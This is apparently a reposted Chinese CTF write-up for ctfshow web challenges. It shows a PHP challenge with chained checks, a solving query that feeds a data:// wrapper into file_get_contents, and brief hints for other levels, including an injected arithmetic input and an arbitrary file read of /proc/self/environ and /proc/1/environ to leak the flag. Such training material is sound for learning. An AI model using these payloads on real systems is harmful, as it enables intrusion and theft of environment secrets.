<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2021-11-18 21:25:22
# @Last Modified by: h1xa
# @Last Modified time: 2021-11-18 22:14:12
# @email: h1xa@ctfer
# @link: */
echo !(!(include "flag.php")||(!error_reporting(0))||stripos($_GET['filename'],'.')||($_GET['id']!=0)||(strlen($_GET['content'])<=7)||(!eregi("ctfsho".substr($_GET['content'],0,1),"ctfshow"))||substr($_GET['content'],0,1)=='w'||(file_get_contents($_GET['filename'],'r') !== "welcome2ctfshow"))?$flag:str_repeat(highlight_file(__FILE__), 0);
很多个条件都要满足,拆分来仔细看就行,并不难
/?filename=data://text/plain,welcome2ctfshow&id=0&content=Wasdasdasdasdad
后缀onion,多百度一下就知道了
1
1
1)+110+(1
验证码处存在任意文件读取,直接读/proc/self/environ就能看到flag
预期方法群里有发,非预期是赛后羽师傅说的,读/proc/1/environ就能读到…
本文发布于:2024-02-03 01:17:21,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/170689424547695.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
留言与评论(共有 0 条评论) |